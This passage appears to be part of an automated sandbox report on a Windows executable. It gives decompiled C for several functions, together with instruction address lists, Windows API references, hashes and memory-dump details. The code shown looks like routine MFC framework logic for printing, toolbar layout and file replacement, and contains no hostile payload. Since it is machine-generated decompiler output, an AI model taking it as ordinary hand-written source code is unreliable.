						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						_t473 =  *((intOrPtr*)(_t357 + 0x10));
						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
							goto L5;
						} else {
							_push(0xffffffff);
							_push(0);
							_push(0xf106);
							E0041BB7E(_t448, _t473);
						}
					}
				}
				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
				_t228 = E004288AC(_t463 - 0x80);
				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
				return _t228;
			}

0x00428108
0x0042810d
0x00428116
0x0042811b
0x0042811e
0x00428125
0x00428133
0x0042818d
0x00428195
0x0042819b
0x0042819d
0x004281a3
0x004281a8
0x004281ae
0x004281b2
0x004281b5
0x004281b9
0x00428305
0x00428305
0x0042830a
0x0042830d
0x00428310
0x00428314
0x00428316
0x00428333
0x00428318
0x0042831f
0x0042831f
0x0042833e
0x00428341
0x00428348
0x00428348
0x00428355
0x00428359
0x00428361
0x00428364
0x0042836a
0x0042836f
0x00428375
0x00428378
0x0042837b
0x0042837f
0x00428382
0x004283b6
0x004283cf
0x004283d4
0x00428384
0x0042838b
0x00428391
0x0042839a
0x0042839e
0x004283a6
0x004283aa
0x004283af
0x004283af
0x004283dc
0x004283e1
0x004283e4
0x004283e8
0x004283f6
0x004283fb
0x004283fb
0x0042840e
0x00428414
0x00428417
0x00428421
0x00428421
0x0042842f
0x00428434
0x0042843b
0x00428440
0x00428445
0x00428451
0x0042845a
0x00428466
0x00428473
0x0042847c
0x00428484
0x00428488
0x00428495
0x004284a8
0x004284b5
0x004284c0
0x004284c6
0x004284c9
0x00428525
0x00428528
0x0042852b
0x0042852f
0x00428533
0x00428537
0x00428539
0x0042853c
0x0042853e
0x0042853e
0x00428541
0x00428545
0x00428548
0x0042854a
0x0042854a
0x0042854d
0x0042854f
0x00428551
0x00428551
0x00428553
0x00428555
0x00428557
0x00428557
0x00428559
0x00428561
0x00428565
0x00428566
0x00428569
0x0042856c
0x00428573
0x00428573
0x00428573
0x0042856e
0x0042856e
0x0042856e
0x0042857e
0x00428583
0x00428586
0x00428589
0x004285b4
0x004285b7
0x004285ba
0x00000000
0x004285c0
0x004285c6
0x004285d2
0x004285d8
0x004285db
0x00000000
0x00000000
0x004285ee
0x004285f4
0x00428609
0x00428613
0x00428626
0x00428635
0x0042863e
0x00428644
0x00428646
0x004286a8
0x004286a8
0x004286ab
0x00428648
0x00428648
0x0042864e
0x00428651
0x0042865f
0x0042865f
0x00428671
0x00428680
0x00428682
0x00000000
0x00428684
0x00428688
0x0042868d
0x0042868f
0x00000000
0x00428691
0x00428694
0x00428697
0x0042869d
0x004286a0
0x00000000
0x00000000
0x004286a6
0x004286a0
0x0042868f
0x00428682
0x00000000
0x00428646
0x00000000
0x004285c6
0x0042858b
0x00428597
0x004285a9
0x004286b2
0x004286b2
0x004286b5
0x004286b7
0x004286ba
0x004286ca
0x004286bc
0x004286bc
0x004286bf
0x004286bf
0x004286ba
0x004286b5
0x004286d9
0x004286ea
0x004286f6
0x004286fe
0x004284cb
0x004284d5
0x004284db
0x004284de
0x00000000
0x004284e0
0x004284e9
0x004284fa
0x00428506
0x0042850e
0x00428513
0x00428515
0x00428516
0x0042851b
0x0042851b
0x004284de
0x00428706
0x0042870a
0x00428715
0x00428719
0x00428723
0x0042872b
0x0042872f
0x00428737
0x0042873b
0x00428740
0x00428744
0x004281bf
0x004281bf
0x004281c2
0x00000000
0x004281c8
0x004281d0
0x004281dd
0x004281e1
0x004281ee
0x004281f2
0x004281ff
0x00428203
0x00428208
0x0042820f
0x00428212
0x00428216
0x00428218
0x0042821b
0x0042821e
0x0042821f
0x0042822d
0x00428231
0x00428237
0x0042823c
0x0042823f
0x00428298
0x00428299
0x004282a2
0x004282a6
0x004282ae
0x004282b2
0x004282bd
0x004282c1
0x004282cc
0x004282d0
0x004282d8
0x004282dc
0x004282e4
0x004282e8
0x004282f0
0x004282f4
0x004282fc
0x00428300
0x00000000
0x00428241
0x00428247
0x0042824b
0x00428256
0x0042825a
0x00428262
0x00428266
0x0042826e
0x00428272
0x0042827a
0x0042827e
0x00428283
0x00428287
0x00428287
0x0042823f
0x004281c2
0x00428747
0x0042874f
0x00428752
0x00428752
0x00428135
0x0042813d
0x00428145
0x00428186
0x00428186
0x00000000
0x0042814d
0x0042815a
0x00428163
0x00428166
0x0042816c
0x0042816f
0x00428172
0x00000000
0x00428174
0x00428174
0x00428176
0x00428177
0x0042817c
0x0042817c
0x00428172
0x00428145
0x00428757
0x0042875e
0x00428769
0x00428771

APIs

__EH_prolog.LIBCMT ref: 00428108

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

Part of subcall function 00413672: GetMessageTime.USER32(Function_0002440D), ref: 00413684
Part of subcall function 00413672: GetMessagePos.USER32 ref: 0041368D

CreateDCA.GDI32(?,?,?,00000000), ref: 0042815A
SetAbortProc.GDI32(?,Function_00027F7F), ref: 00428421
UpdateWindow.USER32(?), ref: 004284C0
StartDocA.GDI32(?,?), ref: 004284D5
EndDoc.GDI32(?), ref: 004286BF

Part of subcall function 0041BB7E: __EH_prolog.LIBCMT ref: 0041BB83

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
String ID:
API String ID: 900908304-0
Opcode ID: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction ID: b1286eb136246b1ee29ef1a1e14188ff5951a4f8bc16bfaf6e35fdac19ebc766
Opcode Fuzzy Hash: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction Fuzzy Hash: 1C127070E01219EFCF14EBA4D885AEDBBB4BF14308F5040AEE515B3292DB789A44DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041D717, Relevance: 21.4, APIs: 14, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D717(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				struct tagRECT _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				struct tagRECT _v88;
				struct tagRECT _v104;
				int _v136;
				char _v144;
				intOrPtr* _t191;
				intOrPtr _t197;
				signed int _t199;
				intOrPtr* _t205;
				intOrPtr _t213;
				signed int _t215;
				long _t218;
				signed int _t219;
				signed int _t225;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr _t238;
				intOrPtr _t239;
				int _t244;
				signed int _t245;
				signed int _t249;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t269;
				signed int _t273;
				signed int _t277;
				long _t285;
				void* _t293;
				signed int _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t305;
				long _t312;
				int _t322;
				long _t327;
				signed int _t333;
				intOrPtr _t336;
				RECT* _t341;
				signed int _t342;
				intOrPtr* _t343;
				int _t345;

				_t293 = __ebx;
				_t336 = __ecx;
				_v68 = __ecx;
				_t191 = E0041E6BA( &_v64, _a8, _a12);
				_t341 = _t336 + 0x94;
				_v12 =  *_t191;
				_v8 =  *((intOrPtr*)(_t191 + 4));
				if(IsRectEmpty(_t341) != 0) {
					GetClientRect( *(E00414C6C(_t336) + 0x1c),  &_v88);
					_t197 = _v88.right - _v88.left;
					_t305 = _v88.bottom - _v88.top;
				} else {
					_t197 = _t341->right - _t341->left;
					_t305 = _t341->bottom - _t341->top;
				}
				_t342 = 0;
				_v48 = _t197;
				_v44 = _t305;
				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
				} else {
					_v136 = 0;
				}
				_t199 =  *0x439bf0; // 0x2
				_push(_t293);
				_t294 =  *0x439bf4; // 0x2
				_v40 = _t342;
				_t295 =  ~_t294;
				_v56 =  ~_t199;
				_v36 = _t342;
				_v16 = _t342;
				if( *(_t336 + 0x84) <= _t342) {
					L73:
					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
						EndDeferWindowPos(_v136);
					}
					SetRectEmpty( &_v104);
					E0041F52D(_t336,  &_v104, _a12);
					if(_a8 == _t342 || _a12 == _t342) {
						if(_v12 != _t342) {
							_v12 = _v12 + _v104.left - _v104.right;
						}
					}
					if(_a8 == _t342 || _a12 != _t342) {
						if(_v8 != _t342) {
							_v8 = _v8 + _v104.top - _v104.bottom;
						}
					}
					_t205 = _a4;
					 *_t205 = _v12;
					 *((intOrPtr*)(_t205 + 4)) = _v8;
					return _t205;
				} else {
					do {
						_t343 = E0041DD28(_t336, _v16);
						_v72 = _t343;
						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
						if(_t343 == 0) {
							if(_t213 != 0) {
								goto L71;
							}
							L58:
							_t215 = _v40;
							if(_t215 != 0) {
								if(_a12 == 0) {
									_t312 = _v56 + _t215 -  *0x439bf0;
									_v56 = _t312;
									if(_v12 <= _t312) {
										_v12 = _t312;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t299 =  *0x439bf4; // 0x2
									_t295 =  ~_t299;
								} else {
									_t295 = _t295 + _t215 -  *0x439bf4;
									_t218 = _v56;
									if(_v12 <= _t218) {
										_v12 = _t218;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t219 =  *0x439bf0; // 0x2
									_v56 =  ~_t219;
								}
								_v40 = _v40 & 0x00000000;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
							L51:
							if(_v36 != 0) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
							goto L71;
						}
						_t225 =  *(_t343 + 0x64);
						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
						} else {
							_t229 = 6;
						}
						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
						_t327 = _v56;
						_v64 =  *_t231;
						_v60 =  *((intOrPtr*)(_t231 + 4));
						_v32.left = _t327;
						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
						_v32.right =  *_t231 + _t327;
						_v32.top = _t295;
						GetWindowRect( *(_t343 + 0x1c),  &_v88);
						E0041A2F1(_t336,  &_v88);
						_t322 = 0;
						if(_a12 == 0) {
							_t238 = _v88.top;
							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, 0, _t238 - _v32.top);
								_t322 = 0;
							}
							_t239 = _v32.bottom;
							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
								_t333 = _v44 - _t239 - _v32.top -  *0x439bf4;
								_t256 = _t333;
								if(_t333 <= _t295) {
									_t256 = _t295;
								}
								OffsetRect( &_v32, _t322, _t256 - _v32.top);
								_t322 = 0;
							}
							if(_v36 == _t322) {
								if(_v32.top < _v44 -  *0x439bf4) {
									goto L44;
								}
								_t249 = _v16;
								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x439bf4; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
								L44:
								_t244 = EqualRect( &_v32,  &_v88);
								if(_t244 == 0) {
									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t343 = _v72;
										_t336 = _v68;
									}
									E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
								}
								_t245 = _v64;
								_t295 = _v32.top -  *0x439bf4 + _v60;
								if(_v40 > _t245) {
									goto L52;
								} else {
									_v40 = _t245;
									goto L51;
								}
							}
						} else {
							_t263 = _v88.left;
							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, _t263 - _v32.left, 0);
								_t322 = 0;
							}
							_t264 = _v32.right;
							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
								L22:
								if(_v36 == _t322) {
									if(_v32.left < _v48 -  *0x439bf0) {
										L27:
										_t269 = EqualRect( &_v32,  &_v88);
										if(_t269 == 0) {
											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t343 = _v72;
												_t336 = _v68;
											}
											E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
										}
										_v56 = _v64 -  *0x439bf0 + _v32.left;
										_t273 = _v60;
										if(_v40 <= _t273) {
											_v40 = _t273;
										}
										goto L52;
									}
									_t249 = _v16;
									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
										goto L27;
									} else {
										L56:
										_t345 = 1;
										E004115B1(_t336 + 0x7c, _t249, _t322, _t345);
										_v36 = _t345;
										goto L58;
									}
								}
								_t277 =  *0x439bf0; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
								goto L27;
							} else {
								_t285 = _v48 - _t264 -  *0x439bf0 - _v32.left;
								if(_t285 <= _v56) {
									_t285 = _v56;
								}
								OffsetRect( &_v32, _t285 - _v32.left, _t322);
								_t322 = 0;
								goto L22;
							}
						}
						L71:
						_v16 = _v16 + 1;
					} while (_v16 <  *(_t336 + 0x84));
					_t342 = 0;
					goto L73;
				}
			}

0x0041d717
0x0041d728
0x0041d72d
0x0041d731
0x0041d738
0x0041d73f
0x0041d745
0x0041d750
0x0041d76d
0x0041d779
0x0041d77c
0x0041d752
0x0041d758
0x0041d75a
0x0041d75a
0x0041d77f
0x0041d781
0x0041d78a
0x0041d78d
0x0041d7a3
0x0041d78f
0x0041d78f
0x0041d78f
0x0041d7a9
0x0041d7ae
0x0041d7af
0x0041d7b5
0x0041d7ba
0x0041d7c2
0x0041d7c5
0x0041d7c8
0x0041d7cb
0x0041db31
0x0041db38
0x0041db48
0x0041db48
0x0041db52
0x0041db61
0x0041db69
0x0041db73
0x0041db7b
0x0041db7b
0x0041db73
0x0041db81
0x0041db8b
0x0041db93
0x0041db93
0x0041db8b
0x0041db96
0x0041db9e
0x0041dba3
0x0041dba7
0x0041d7d1
0x0041d7d1
0x0041d7de
0x0041d7e6
0x0041d7eb
0x0041d7ee
0x0041dabd
0x00000000
0x00000000
0x0041dabf
0x0041dabf
0x0041dac4
0x0041daca
0x0041dafc
0x0041db01
0x0041db04
0x0041db06
0x0041db06
0x0041db0c
0x0041db0e
0x0041db0e
0x0041db11
0x0041db17
0x0041dacc
0x0041dad2
0x0041dad4
0x0041dada
0x0041dadc
0x0041dadc
0x0041dae2
0x0041dae4
0x0041dae4
0x0041dae7
0x0041daee
0x0041daee
0x0041db19
0x0041db19
0x00000000
0x0041dac4
0x0041d800
0x0041da5b
0x0041da5f
0x00000000
0x00000000
0x0041da65
0x0041da70
0x00000000
0x0041da70
0x0041d806
0x0041d80b
0x0041d81d
0x0041d821
0x0041d811
0x0041d813
0x0041d813
0x0041d832
0x0041d83a
0x0041d83d
0x0041d843
0x0041d84f
0x0041d852
0x0041d859
0x0041d85f
0x0041d862
0x0041d86e
0x0041d873
0x0041d878
0x0041d985
0x0041d98b
0x0041d99b
0x0041d9a1
0x0041d9a1
0x0041d9a3
0x0041d9a9
0x0041d9bc
0x0041d9c0
0x0041d9c2
0x0041d9c4
0x0041d9c4
0x0041d9cf
0x0041d9d5
0x0041d9d5
0x0041d9da
0x0041da87
0x00000000
0x00000000
0x0041da8d
0x0041da92
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d9e0
0x0041d9e0
0x0041d9f2
0x0041d9f5
0x0041d9fb
0x0041da03
0x0041da0b
0x0041da13
0x0041da27
0x0041da28
0x0041da29
0x0041da2a
0x0041da2b
0x0041da2e
0x0041da2e
0x0041da3f
0x0041da3f
0x0041da47
0x0041da50
0x0041da56
0x00000000
0x0041da58
0x0041da58
0x00000000
0x0041da58
0x0041da56
0x0041d87e
0x0041d87e
0x0041d884
0x0041d894
0x0041d89a
0x0041d89a
0x0041d89c
0x0041d8a2
0x0041d8d2
0x0041d8d5
0x0041d900
0x0041d919
0x0041d921
0x0041d929
0x0041d931
0x0041d945
0x0041d946
0x0041d947
0x0041d948
0x0041d949
0x0041d94c
0x0041d94c
0x0041d95d
0x0041d95d
0x0041d96e
0x0041d971
0x0041d977
0x0041d97d
0x0041d97d
0x00000000
0x0041d977
0x0041d902
0x0041d907
0x00000000
0x0041daa8
0x0041daa8
0x0041daaa
0x0041dab1
0x0041dab6
0x00000000
0x0041dab6
0x0041d907
0x0041d8d7
0x0041d8dc
0x0041d8ec
0x00000000
0x0041d8a9
0x0041d8b7
0x0041d8bc
0x0041d8be
0x0041d8be
0x0041d8ca
0x0041d8d0
0x00000000
0x0041d8d0
0x0041d8a2
0x0041db1d
0x0041db1d
0x0041db23
0x0041db2f
0x00000000
0x0041db2f

APIs

IsRectEmpty.USER32 ref: 0041D748
GetClientRect.USER32 ref: 0041D76D
BeginDeferWindowPos.USER32 ref: 0041D79D
GetWindowRect.USER32 ref: 0041D862
OffsetRect.USER32(?,?,00000000), ref: 0041D894
OffsetRect.USER32(?,?,00000000), ref: 0041D8CA
OffsetRect.USER32(?,00000002,00000000), ref: 0041D8EC
EqualRect.USER32 ref: 0041D921
OffsetRect.USER32(?,00000000,?), ref: 0041D99B
OffsetRect.USER32(?,00000000,?), ref: 0041D9CF
OffsetRect.USER32(?,00000000,?), ref: 0041D9F5
EqualRect.USER32 ref: 0041DA03
EndDeferWindowPos.USER32(?), ref: 0041DB48
SetRectEmpty.USER32(?), ref: 0041DB52

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction ID: 4bc4fb7537ac9ebda1473157cc7a63845d4aad135b3ed423640b2285e9e568f1
Opcode Fuzzy Hash: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction Fuzzy Hash: 19F1F9B1E0021ADFCF14DFA8D984AEEB7B5FF08305F14816AE516E7251D738A981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418E48, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 168
stringlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00418E48(intOrPtr __ecx) {
				void* __edi;
				void* __esi;
				void* _t60;
				CHAR* _t61;
				_Unknown_base(*)()* _t67;
				void* _t70;
				CHAR* _t73;
				short* _t79;
				CHAR* _t82;
				short* _t88;
				CHAR* _t91;
				void* _t112;
				long _t114;
				short* _t116;
				intOrPtr _t118;
				int _t122;
				int _t124;
				int _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				short* _t133;
				intOrPtr _t135;

				E00406520(E00429FEC, _t127);
				_t130 = _t129 - 0x20;
				_t118 = __ecx;
				_push(_t112);
				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
				E00416861(_t127 - 0x18, __ecx + 0xc);
				 *(_t127 - 4) = 0;
				E004179D8(_t118, _t112, _t118);
				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
					_t61 =  *0x436980; // 0x436994
					_t114 = 0;
					 *(_t127 - 0x14) = _t61;
					_t135 =  *0x439c38; // 0x0
					 *(_t127 - 4) = 1;
					if(_t135 != 0) {
						L15:
						E00417B0B( *(_t127 - 0x18));
						goto L16;
					} else {
						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
						_t136 = _t67;
						 *(_t127 - 0x2c) = _t67;
						if(_t67 == 0) {
							goto L15;
						} else {
							_push(0);
							_push( *(_t118 + 0x10));
							_push(_t127 - 0x28);
							_t70 = E00418BE2(_t136);
							_t133 = _t130 + 0xc;
							 *(_t127 - 4) = 2;
							E00416B95(_t127 - 0x14, _t127, _t70);
							_t111 = _t127 - 0x28;
							 *(_t127 - 4) = 1;
							E00416AEC(_t127 - 0x28);
							_t73 =  *(_t127 - 0x14);
							 *(_t127 - 0x10) = _t73;
							if(_t73 != 0) {
								_t122 = lstrlenA(_t73) + 1;
								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
								E00406830(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
								_t79 = _t133;
								 *(_t127 - 0x24) = _t79;
								 *_t79 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
								 *(_t127 - 0x20) =  *(_t127 - 0x24);
							} else {
								 *(_t127 - 0x20) = 0;
							}
							_t82 =  *(_t118 + 0x10);
							 *(_t127 - 0x10) = _t82;
							if(_t82 != 0) {
								_t124 = lstrlenA(_t82) + 1;
								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
								E00406830(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
								_t88 = _t133;
								 *(_t127 - 0x24) = _t88;
								 *_t88 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								 *(_t127 - 0x24) = 0;
							}
							_t91 =  *(_t127 - 0x18);
							 *(_t127 - 0x10) = _t91;
							if(_t91 != 0) {
								_t126 = lstrlenA(_t91) + 1;
								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
								E00406830(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
								_t116 = _t133;
								 *_t116 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								_t116 = 0;
							}
							_push(0);
							_push(0);
							_push(3);
							_push( *(_t127 - 0x20));
							_push( *(_t127 - 0x24));
							_push(_t116);
							if( *(_t127 - 0x2c)() != 0) {
								E00417B0B( *(_t127 - 0x14));
							} else {
								_t114 = GetLastError();
								if(_t114 == 0x498 || _t114 == 0) {
									goto L15;
								}
								L16:
								if(_t114 == 0x499) {
									E00417B0B( *(_t127 - 0x14));
								}
								E00417AE9( *(_t118 + 0x10),  *(_t127 - 0x18));
							}
						}
					}
					 *(_t127 - 4) = 0;
					E00416AEC(_t127 - 0x14);
				}
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				_t60 = E00416AEC(_t127 - 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
				return _t60;
			}

0x00418e4d
0x00418e52
0x00418e57
0x00418e59
0x00418e5d
0x00418e64
0x00418e6d
0x00418e70
0x00418e7b
0x00418e81
0x00418e86
0x00418e88
0x00418e8b
0x00418e91
0x00418e95
0x00418fcf
0x00418fd2
0x00000000
0x00418e9b
0x00418eac
0x00418eb2
0x00418eb4
0x00418eb7
0x00000000
0x00418ebd
0x00418ec0
0x00418ec1
0x00418ec5
0x00418ec6
0x00418ecb
0x00418ed2
0x00418ed6
0x00418edb
0x00418ede
0x00418ee2
0x00418ee7
0x00418ef2
0x00418ef5
0x00418f01
0x00418f08
0x00418f0a
0x00418f0f
0x00418f18
0x00418f1b
0x00418f20
0x00418f29
0x00418f2c
0x00418ef7
0x00418ef7
0x00418ef7
0x00418f2f
0x00418f34
0x00418f37
0x00418f43
0x00418f4a
0x00418f4c
0x00418f51
0x00418f5a
0x00418f5d
0x00418f62
0x00418f6b
0x00418f39
0x00418f39
0x00418f39
0x00418f71
0x00418f76
0x00418f79
0x00418f84
0x00418f8b
0x00418f8d
0x00418f92
0x00418f9b
0x00418fa0
0x00418fa6
0x00418f7b
0x00418f7b
0x00418f7b
0x00418fa9
0x00418faa
0x00418fab
0x00418fad
0x00418fb0
0x00418fb3
0x00418fb9
0x00418ff8
0x00418fbb
0x00418fc1
0x00418fc9
0x00000000
0x00000000
0x00418fd7
0x00418fdd
0x00418fe2
0x00418fe2
0x00418fee
0x00418fee
0x00418fb9
0x00418eb7
0x00419000
0x00419003
0x00419003
0x00419008
0x0041900f
0x0041901a
0x00419025

APIs

__EH_prolog.LIBCMT ref: 00418E4D

Part of subcall function 00416861: InterlockedIncrement.KERNEL32(?), ref: 00416876

Part of subcall function 004179D8: CloseHandle.KERNEL32(00000001,?,?,0041772F,?,?,004176CD), ref: 004179E7
Part of subcall function 004179D8: GetLastError.KERNEL32(00000000,0041772F,?,?,004176CD), ref: 00417A0C

GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 00418EA0
GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 00418EAC

Part of subcall function 00418BE2: __EH_prolog.LIBCMT ref: 00418BE7
Part of subcall function 00418BE2: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
Part of subcall function 00418BE2: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

lstrlenA.KERNEL32(?), ref: 00418EFD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00418F20
lstrlenA.KERNEL32(?,?,00000001), ref: 00418F3F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 00418F62
lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 00418F80
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 00418FA0
GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 00418FBB

Strings

ReplaceFile, xrefs: 00418EA6
KERNEL32, xrefs: 00418E9B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
String ID: KERNEL32$ReplaceFile
API String ID: 3306742873-430465611
Opcode ID: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction ID: 35d1a50c5f76602bfe157e4308a6fe3e42fd926e881e06ee79976fcc1b195d94
Opcode Fuzzy Hash: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction Fuzzy Hash: 4B516FB2D00219AFCB10EFA5CC858EFBBB9EF08354B51056EE411B3250DB389E45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422A19, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00422A19(void* __edi, void* __esi) {
				void* _t28;
				void* _t31;
				void* _t42;
				struct HFONT__* _t50;
				void* _t53;
				void* _t64;
				void* _t65;
				void* _t67;
				void* _t70;
				intOrPtr _t76;
				void* _t77;
				void* _t79;
				void* _t86;

				_t67 = __esi;
				_t64 = __edi;
				_t28 = E00406520(E0042A954, _t70);
				_t76 =  *0x439c44; // 0x1
				if(_t76 != 0) {
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
					return _t28;
				}
				E00425F56(0xa);
				_t77 =  *0x439ca4; // 0x0
